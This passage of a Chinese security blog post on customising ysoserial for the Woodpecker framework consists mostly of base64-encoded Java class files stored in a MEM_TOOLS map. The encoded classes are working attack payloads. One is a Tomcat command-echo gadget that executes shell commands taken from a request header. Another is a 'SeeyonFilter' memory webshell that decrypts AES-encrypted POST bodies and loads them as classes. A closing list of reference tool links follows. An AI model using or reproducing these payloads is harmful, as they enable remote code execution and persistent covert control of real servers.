QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBjBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEABXFheG5iDADqAOsBAAlzZXRTdGF0dXMMAOwAXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABGAO0BAAdvcy5uYW1lBwDuDADvAPAMAPEA3gEAA3dpbgEAB2NtZC5leGUBAAIvYwEACS9iaW4vYmFzaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIMAEYA8gwA8wD0BwD1DAD2APcMAEYA+AEAAlxBDAD5APoMAPsA3gwA/AD9AQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rDAD+AP8MAQABAQEACHNldEJ5dGVzDAECAOYBAAdkb1dyaXRlAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAE2phdmEubmlvLkJ5dGVCdWZmZXIBAAR3cmFwAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAKGRvZ2VzZXIvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQALdG9Mb3dlckNhc2UBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdm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");
MEM_TOOLS.put("JettyFilterMemShell", "");
MEM_TOOLS.put("TomcatFilterMemShellFromThread", "");
MEM_TOOLS.put("SeeyonFilter", "yv66vgAAADQA1AoALABnBwBoBwBpCABqCwACAGsIAGwKAG0AbggAbwsAAgBwCABxCwACAHIIAHMLAHQAdQgAdgoAdwB4BwB5CgBtAHoKABAAewoAdwB8BwB9CgAUAGcIAH4LAH8AgAgAVAgAUgcAgQgAggcAgwcASwkAhACFCgAcAIYKAIcAiAcAiQoAIQBnCwACAIoKAIsAjAoAIQCNCgB3AI4HAI8HAJAKACwAkQoAHACSCgAnAJMHAJQKAIQAlQoAhwCWCgAcAJcKACwAbgcAmAsAmQCaBwCbBwCcAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMZG9nZXNlci9wYXlsb2Fkcy90ZW1wbGF0ZXMvU2VleW9uRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAJ0BAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQAHb2JqZWN0cwEAD0xqYXZhL3V0aWwvTWFwOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFYnl0ZXMBAAJbQgEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAPc2VydmxldFJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEAC2ZpbHRlckNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAA2tleQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEADVN0YWNrTWFwVGFibGUHAJsHAJ4HAJ8HAKAHAGgHAGkHAKEHAJgHAKIBAAdkZXN0cm95AQAKU291cmNlRmlsZQEAEVNlZXlvbkZpbHRlci5qYXZhDAA1ADYBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABBlNDVlMzI5ZmViNWQ5MjViDACjAKQBAARQT1NUBwChDAClAKYBAAp1c2VyLXRva2VuDACnAKgBAAVxYXhuYgwAqQCqAQABdQcAqwwArACtAQADQUVTBwCuDACvALABAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDACxALIMADUAswwAPAC0AQARamF2YS91dGlsL0hhc2hNYXABAAdzZXNzaW9uBwC1DAC2ALcBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAtkZWZpbmVDbGFzcwEAD2phdmEvbGFuZy9DbGFzcwcAuAwAuQC6DAC7ALwHAL0MAL4AvwEAFnN1bi9taXNjL0JBU0U2NERlY29kZXIMAMAAwQcAwgwAwwCkDADEAMUMAMYAxwEAF2phdmEvbmV0L1VSTENsYXNzTG9hZGVyAQAMamF2YS9uZXQvVVJMDADIAMkMAMoAywwANQDMAQAQamF2YS9sYW5nL09iamVjdAwAzQDODADPANAMANEA0gEAE2phdmEvbGFuZy9FeGNlcHRpb24HAKAMAEIA0wEAJ2RvZ2VzZXIvcGF5bG9hZHMvdGVtcGxhdGVzL1NlZXlvbkZpbHRlcgEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAEGphdmEvbGFuZy9TdHJpbmcBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAJZ2V0TWV0aG9kAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACmdldFNlc3Npb24BACIoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQAIcHV0VmFsdWUBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9PYmplY3Q7KVYBABNqYXZheC9jcnlwdG8vQ2lwaGVyAQALZ2V0SW5zdGFuY2UBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAA1qYXZhL3V0aWwvTWFwAQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQAJZ2V0UmVhZGVyAQAaKClMamF2YS9pby9CdWZmZXJlZFJlYWRlcjsBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyAQAIcmVhZExpbmUBAAxkZWNvZGVCdWZmZXIBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAHZG9GaW5hbAEABihbQilbQgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQBAKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTspVgAhADMALAABADQAAAAEAAEANQA2AAEANwAAADMAAQABAAAABSq3AAGxAAAAAgA4AAAACgACAAAAEgAEABMAOQAAAAwAAQAAAAUAOgA7AAAAAQA8AD0AAgA3AAAANQAAAAIAAAABsQAAAAIAOAAAAAYAAQAAABYAOQAAABYAAgAAAAEAOgA7AAAAAAABAD4APwABAEAAAAAEAAEAQQABAEIAQwACADcAAAIsAAYACwAAARQrwAACOgQswAADOgUSBDoGGQS5AAUBABIGtgAHmQDvGQQSCLkACQIAEgq2AAeZAN4ZBLkACwEAEgwZBrkADQMAEg64AA86BxkHBbsAEFkZBrYAERIOtwAStgATuwAUWbcAFToIGQgSFhkEuQALAQC5ABcDAFcZCBIYGQW5ABcDAFcZCBIZGQS5ABcDAFcSGhIbBr0AHFkDEh1TWQSyAB5TWQWyAB5TtgAfOgkZCQS2ACAZB7sAIVm3ACIZBLkAIwEAtgAktgAltgAmOgoZCbsAJ1kDvQAoKrYAKbYAKrcAKwa9ACxZAxkKU1kEA7gALVNZBRkKvrgALVO2AC7AABy2AC8ZCLYAMFexOgctKyy5ADIDALEAAQAwAQgBCQAxAAQAOAAAAE4AEwAAABkABgAaAAwAGwAQABwAMAAeAEAAHwBHACAAWwAhAGQAIgB1ACMAgQAkAI0AJQCrACYAsQAnAMwAKAEIACkBCQAqAQsALgETAC8AOQAAAHAACwBHAMIARABFAAcAZAClAEYARwAIAKsAXgBIAEkACQDMAD0ASgBLAAoAAAEUADoAOwAAAAABFABMAE0AAQAAARQATgBPAAIAAAEUAFAAUQADAAYBDgBSAFMABAAMAQgAVABVAAUAEAEEAFYAVwAGAFgAAAAMAAEAZAClAEYAWQAIAFoAAAAiAAL/AQkABwcAWwcAXAcAXQcAXgcAXwcAYAcAYQABBwBiAQBAAAAABgACAGMAQQABAGQANgABADcAAAArAAAAAQAAAAGxAAAAAgA4AAAABgABAAAAMgA5AAAADAABAAAAAQA6ADsAAAABAGUAAAACAGY=");

0x03 参考链接

  • DNSLOG探测Gadget https://github.com/kezibei/Urldns
  • Y4er大佬二次开发YSO https://github.com/Y4er/ysoserial

文章来源: https://1oecho.github.io/woodpcker-makeYso/
如有侵权请联系:admin#unsafe.sh